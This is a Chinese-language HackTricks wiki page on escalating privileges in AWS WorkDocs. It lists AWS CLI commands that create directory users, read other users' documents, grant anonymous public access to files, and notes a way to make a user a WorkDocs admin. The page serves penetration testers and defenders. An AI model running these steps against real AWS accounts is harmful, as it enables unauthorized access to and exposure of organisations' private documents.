Chinese - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - WorkDocs Privesc

WorkDocs

有关WorkDocs的更多信息,请查看:

AWS - Directory Services / WorkDocs Enum

workdocs:CreateUser

在指定的目录中创建用户,然后您将可以访问WorkDocs和AD:

# Create user (created inside the AD)
aws workdocs create-user --username testingasd --given-name testingasd --surname testingasd --password <password> --email-address name@directory.domain --organization-id <directory-id>

workdocs:GetDocument, (workdocs:DescribeActivities)

这些文件可能包含敏感信息,请阅读它们:

# Get what was created in the directory
aws workdocs describe-activities --organization-id <directory-id>

# Get what each user has created
aws workdocs describe-activities --user-id "S-1-5-21-377..."

# Get file (a url to access with the content will be retreived)
aws workdocs get-document --document-id <doc-id>

workdocs:AddResourcePermissions

如果您没有权限读取某些内容,您可以直接授予该权限

# Add permission so anyway can see the file
aws workdocs add-resource-permissions --resource-id <id> --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER
## This will give an id, the file will be acesible in: https://<name>.awsapps.com/workdocs/index.html#/share/document/<id>

workdocs:AddUserToGroup

您可以通过将用户设置为组ZOCALO_ADMIN来使其成为管理员。 要执行此操作,请按照以下说明操作:https://docs.aws.amazon.com/workdocs/latest/adminguide/manage_set_admin.html

使用该用户登录到workdoc,并在/workdocs/index.html#/admin中访问管理员面板。

我没有找到通过命令行执行此操作的方法。

PreviousAWS - STS PrivescNextAWS - Services

Last updated